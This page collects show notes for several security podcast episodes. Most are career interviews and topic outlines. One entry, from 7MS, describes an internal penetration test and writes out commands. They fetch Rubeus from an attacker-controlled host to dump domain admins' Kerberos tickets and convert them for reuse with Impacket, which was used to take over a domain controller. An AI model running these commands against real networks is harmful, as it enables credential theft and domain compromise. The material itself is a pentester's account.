Weekly Update 214
39 min

Getting the New iPhone 12 Pro; AmpliFi ALIEN; Trump on Passwords; On Trump’s Password; AmpliFi or UniFi; Sponsored by Varonis

https://www.troyhunt.com/weekly-update-214/

See omnystudio.com/listener for privacy information.

7 Minute Security
Brian Johnson
7MS #442: Tales of Internal Network Pentest Pwnage - Part 23
Hey friends, I dare declare this to be my favorite tale of internal pentest pwnage so far. Why? Because the episode features:

* Great blue team tools alerting our customer to a lot of the stuff we were doing
* An EDR that we tried to beat up (but it beat us up instead)
* SharpGPOAbuse which we talked about extensively last week
* Separation of "everyday" accounts from privileged accounts
* Multi-factor authentication bypass!
* Some delicious findings in GPOs thanks to Ryan Hausec's great two part series (1 and 2). If you're not sure if you're vulnerable to MS14-025, check out this great article which discusses the vulnerability and its mitigation.

The final cherry on top was a new attack another pentester taught me. Use a combination of SharpCradle and Rubeus to steal logged in DA creds:

    SharpCradle.exe -w https://your.kali.box.ip/Rubeus.exe dump /service:krbtgt /nowrap

This will give you a TGT (base64 encoded) for active logon sessions to the box. So if a DA is logged in, you can snag their TGT and then convert that into a .kirbi file on your Kali box with:

    echo "LooooonnnnnggggggTicketStriiiiiiiiiiinnnngggg" | base64 -d > BobTheDomainAdmin.kirb

Convert the .kirbi file to a .ccache file with ticket converter. Then you can use Impacket tools to use/abuse that access to your heart's delight. We ended up using Impacket to pop a shell on a DC and add a low-priv account to DA. The interesting thing is that the alert the blue team received essentially said "The DC itself added the user to the DA group" - the alert did not have attribution to the user whose ticket we stole! Good tip for future pentests!
1 hr 9 min
Hacker Valley Studio
Hacker Valley Media
Episode 106 - Stacking the Deck of Success with AJ Yawn
In this episode of the Hacker Valley Studio podcast, hosts Ron and Chris interview AJ Yawn in an episode that is a mix between a master class and a founder’s journey. AJ is the founder and CEO of ByteChek, with a personal and company goal to “make compliance suck less.” He is a cloud security expert, and brings to the conversation a wealth of wisdom on cybersecurity, leadership, and personal growth. The episode focuses on topics surrounding a major event in the past week for AJ and ByteChek, addressing AJ’s background, the work surrounding ByteChek’s genesis, AJ’s thoughts on compliance, and more!

The interview begins with a look at AJ’s background. AJ grew up a military brat, and eventually found himself in the Army for a time. While he did not place much consideration on technology before he entered the Army, it was during his Army career that AJ developed an interest in cybersecurity. He became passionate about cybersecurity and the cloud, and he went all in! After he left the service, he began a job in cybersecurity consulting, and he’s been in the field ever since.

This episode is recorded at another momentous shift in AJ’s career, though, and Ron and Chris invite him to share about the past week, focusing on highs and lows. AJ shares about how he and his friend Jeff just launched ByteChek days ago, choosing as their launch date the significant holiday of Veterans Day! This choice was a way to honor AJ’s family members who served before him, and Ron and Chris also thank AJ for his own service to his country. In light of this exciting time, AJ explains what the early days of the company have been like and considers some influences that have shaped him. In this stage of his company, AJ has capitalized on LinkedIn. He had previously not been accustomed to using the site or to the more general task of business promotion, but he’s found that networking on LinkedIn is a great way to grow a new business.
He also explores ways in which his background in sports and as a middle child among nine siblings have shaped him as a cybersecurity worker and entrepreneur. Such factors of his youth helped him to foster a growth mindset and competitive nature, and also taught him to stand in his power. Next, AJ talks about the thinking behind the tagline, “make compliance suck less,” which is honest, humorous, and relevant to the problem that drove AJ to start the company. As he navigates issues of business, compliance, and the like, AJ demonstrates remarkable capacities for focus. Ron and Chris wonder how he manages to focus on a single subject and to stay intentional for months or even years at a time, and AJ answers that he focuses on the process. In order to do so, he relies on the 90-91 model (which calls for the first 90 minutes of his day to be centered on a certain thing), as well as an array of goals. AJ is also deeply committed to an active pursuit of personal growth. One of the clearest demonstrations of this commitment came in the years leading up to the launch of ByteChek. AJ saw the need for such a company years ago and had it in mind to start his own company, knowing that he needed to take a chance to make the impact he wanted to make. However, he also knew that he was not yet ready to start a business, so he created a masterclass for himself to prepare. Since, in first forming the company, he needed to place special focus on learning the business and marketing side of things, his successful navigation of LinkedIn is just one testament to the effectiveness of his intentional training. Even in the midst of the fear surrounding the COVID-19 pandemic (and many problems for businesses), AJ was confident in betting on himself and launching ByteChek. And he’s confident in the future of the company, as well. He invests himself in making compliance exciting for clients, and among his projections for the future of compliance, he even includes plans for a ByteChek Academy! 
As the conversation reaches a close, AJ provides listeners with a final nugget of wisdom pertaining to the two most prominent themes of the conversation: betting on oneself and stepping into one’s personal power.

* 1:35 - This episode features AJ Yawn!
* 2:53 - AJ and his hosts turn to background info and what AJ is doing today.
* 4:35 - This past week has been huge for AJ because of his company launch!
* 6:33 - Did AJ’s interest in cybersecurity start while he was in the Army?
* 8:49 - The group speaks of AJ’s family background, including the fact that he is one of nine kids!
* 10:00 - Has being in the middle of a big family and playing sports shaped AJ?
* 12:52 - AJ and his hosts consider ByteChek’s tagline.
* 15:21 - How does AJ focus so well?
* 17:18 - Why did he launch the company now, even in the midst of COVID-19?
* 21:21 - AJ created a masterclass for himself.
* 25:38 - How does AJ make compliance exciting?
* 29:39 - AJ is asked about the future of compliance.
* 33:45 - What’s one nugget of wisdom AJ can offer concerning two main themes of the episode?

Links:

* Connect with AJ on LinkedIn.
* Learn more about Hacker Valley Studio.
* Support Hacker Valley Studio on Patreon.
* Follow Hacker Valley Studio on Twitter.
* Follow hosts Ron Eddings and Chris Cochran on Twitter.
* Learn more about ByteChek, and mention Hacker Valley Studio to receive a limited time offer!
39 min
Getting Into Infosec
Ayman Elsawah (@coffeewithayman)
Lisa Jiggetts - From Navy Cook To Pentester To Non-Profit Founder!
Lisa Jiggetts knew from an early age that she was going to be in tech and cyber. A navy veteran who started off as a cook, she always found herself gravitating towards technology. She is also the Founder & Board of Director of Women’s Society of Cyberjutsu, a non-profit that is dedicated to increasing the opportunities and advancement for women in cybersecurity. Check out her journey into the cybersecurity field.

Notes

* Originally a cook in the military, then migrated to information security.
* Looked for opportunities to transition into information security by talking to people in and outside her social network.
* Networking can be hard, but it will turn in your favor.
* Lisa is an introvert, but knows how to become an extrovert when needed.

Quotes

* "When you're starting out, you don't necessarily get into the area you want to be in—you got to work your way up."
* “That's the biggest thing you can do. I think is networking because somebody knows somebody"
* "So I got all these certifications… I read a book and pass. What is it to me personally? That didn't tell me, you know, how to do anything. They get you in the door"
* "[Networking is] hard, but, just do it because in the end, it's gonna turn out in your favor."

Links

* Lisa on Twitter: https://twitter.com/lisajiggetts
* Intro Music: https://trash80.com/#/content/133/weeklybeats-2012-week5
* Women’s Society of Cyberjutsu : https://womenscyberjutsu.org/

Getting Into Infosec

* Breaking IN: A Practical Guide to Starting a Career in Information Security: https://www.amazon.com/dp/B07N15GTPC/
* T-Shirts, Mugs, and more: https://gettingintoinfosec.com/shop/
* Stay in touch and sign up for sneak peeks, updates, and commentary: https://pages.gettingintoinfosec.com/subscribe
* Ayman on Twitter: https://twitter.com/coffeewithayman
42 min
Cyber Work
Infosec
Privileged access management and work-from-home tips
Today we’re talking cloud security and work-from-home. If you’ve ever checked your work email on your personal phone – I know you have, because we’ve all done it! – or touched up some time-sensitive spreadsheets on the same iPad your kids use to play Animal Crossing, Terence Jackson, Chief Information Security & Privacy Officer of Thycotic, is going to tell you how to tighten up your security protocols to ensure that work-from-home doesn’t become breach-from-home!

– Enter code “cyberwork” to get 30 days of free training with Infosec Skills: https://www.infosecinstitute.com/skills/
– View transcripts and additional episodes: https://www.infosecinstitute.com/podcast

With more than 17 years of public and private sector IT and security experience, Terence Jackson is responsible for protecting the company’s information assets. In his role, he currently leads a corporate-wide information risk management program. He identifies, evaluates and reports on information security practices, controls and risks in order to comply with regulatory requirements and to align with the risk posture of the enterprise. Prior to joining Thycotic, Terence was the Director of Cybersecurity and Professional Services for TSI, a Virginia based Inc. 5000 company. He has also worked as a Senior Security Consultant for Clango, Inc., a top Identity and Access Management (IAM) consultancy. He was featured in and also was a contributor to the book “Tribe of Hackers.”

About Infosec

Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.
50 min
Brakeing Down Security Podcast
Bryan Brake, Amanda Berlin, Brian Boettcher
2020-043-Software_Defined_Radio-Sebastien_dudek-RF-attacks- IoT and car RF attacks
Sébastien Dudek - @FlUxIuS @penthertz

* Why we are here today?
* Software Defined Radio (sdr-radio.com)
* What kind of hardware or software do you need?
* Why would a security professional want to know how to use SDR tools and attacks?
* What other kinds of attacks can be launched? (I mean, other than replay type attacks)
  * Door systems (badge systems)
  * NFC?
  * Contactless credit card attacks
  * Smart building/home control systems
  * Bluetooth attacks
  * Point Of Sale systems
  * Cellular radio 3g/4g/5g
  * Industrial control systems
  * Home appliances
  * Medical telemetry systems
  * Drones!
* LoRa - Wikipedia
* DASH7 - Wikipedia - custom TCP stack for LoRa
* Vehicle-to-grid - Wikipedia (V2G)
* Automatic Wireless Protocol Reverse Engineering | USENIX
* Hunting mobile devices endpoints - the RF and the Hard way | Synacktiv - Sébastien Dudek
* How Can Drones Be Hacked? The updated list of vulnerable drones & attack tools | by Sander Walters | Medium
* Carrier Aggregation explained (3gpp.org)
* Mobile phone jammer - Wikipedia
* World’s top hackers meet at the first 5G Cyber Security Hackathon - Security Boulevard
* Supply chain attacks - systems tend to use wireless chipsets or protocols
* LTE-torpedo-NDSS19.pdf (uiowa.edu) - privacy attacks on 4g/5g networks using side channel information
* How does someone make a faraday cage on the cheap? (mentioned in one of your class agendas)
* Lots of IoT devices use your typical home wifi connection, can’t you just sniff packets to get what you need?
* Replay attacks on car fobs: Jam and Replay Attacks on Vehicular Keyless Entry Systems (s34s0n.github.io)
* Attacks on Tesla wireless entry: Tesla’s keyless entry vulnerable to spoofing attack, researchers find - The Verge
* Garage door opener attacks: How to Hack a Garage Door in Under 10 Seconds and What You Can Do About It - ITS Tactical
* Kid’s toy opens garage doors: This Hacked Kids' Toy Opens Garage Doors in Seconds | WIRED
* What are the current limitations to testing wireless and RF related systems?
* What about custom wireless implementations? Cellular? Zigbee?
* I’m a wireless manufacturer of some kind of device. I’m freaked now by hearing you talk about how easy it is to attack wireless systems. What are some things I could do to ensure that the types of attacks we discussed here cannot affect me?
* Wireless defense system? https://www.researchgate.net/publication/321491751_Security_Mechanisms_to_Defend_against_New_Attacks_on_Software-Defined_Radio
* List of SDR software: The BIG List of RTL-SDR Supported Software (rtl-sdr.com)
32 min
The Social-Engineer Podcast
Social-Engineer, LLC
Ep. 135 - Fear of video and snakes with Lisa Forte
In this episode, Chris Hadnagy and Maxie Reynolds are joined by social engineering and insider threats expert: Lisa Forte. Learn how Lisa went from fighting terrorists and real-life sea pirates to being an expert on cybercrime and social engineering. Discover how scammers are taking advantage of global uncertainty and understand how to protect yourself from attack.

* 00:00 – Introduction to Lisa Forte
* 02:38 – Lisa's path to a career in social engineering
* 05:27 – The psychology that terrorists use to recruit teenagers
* 07:52 – Lisa's experience with fighting cyber crime
* 08:43 – Why Lisa named her cyber security company “Red Goat”
* 10:23 – The world pandemic made hospitals and their supply chains vulnerable to attack
* 14:38 – Keep secure by realizing the value of the information you possess
* 15:41 – How Cyber Volunteers 19 is helping to save lives by making hospitals secure. (twitter)
* 21:25 – Ego suspension is a required skill for a good social engineer
* 25:47 – Find someone who gives you honest feedback
* 27:28 – How Chris deals with harsh criticism
* 30:27 – New documentary: “hacker:HUNTER Ha(ck)cine” (Part 1) (Part 2)
* 34:44 – Lisa's Vlog: “Rebooting”
* 35:44 – Lisa's and Chris’s experience with exposure therapy.
* 40:00 – How scammers take advantage of global uncertainty
* 42:37 – Law enforcement has a big disadvantage when fighting cyber crime
* 45:42 – Lisa’s Contact info: LinkedIn Website Rebooting vlog with Chris Twitter
* 46:56 – Lisa's Book recommendation Prisoners Of Geography
* 50:20 – Outro

Links:

* Social-Engineer.com
* Social-Engineer.org
* The Human Hacking Conference
* The Innocent Lives Foundation
* Human Hacking Book
* Phishing As A Service®

Trainings:

* Practical Open Source Intelligence For Everyday Social Engineers * 11-12 November 2020 - VIRTUAL
* Advanced Practical Social Engineering Training * 17-20 November, 2020 - VIRTUAL
53 min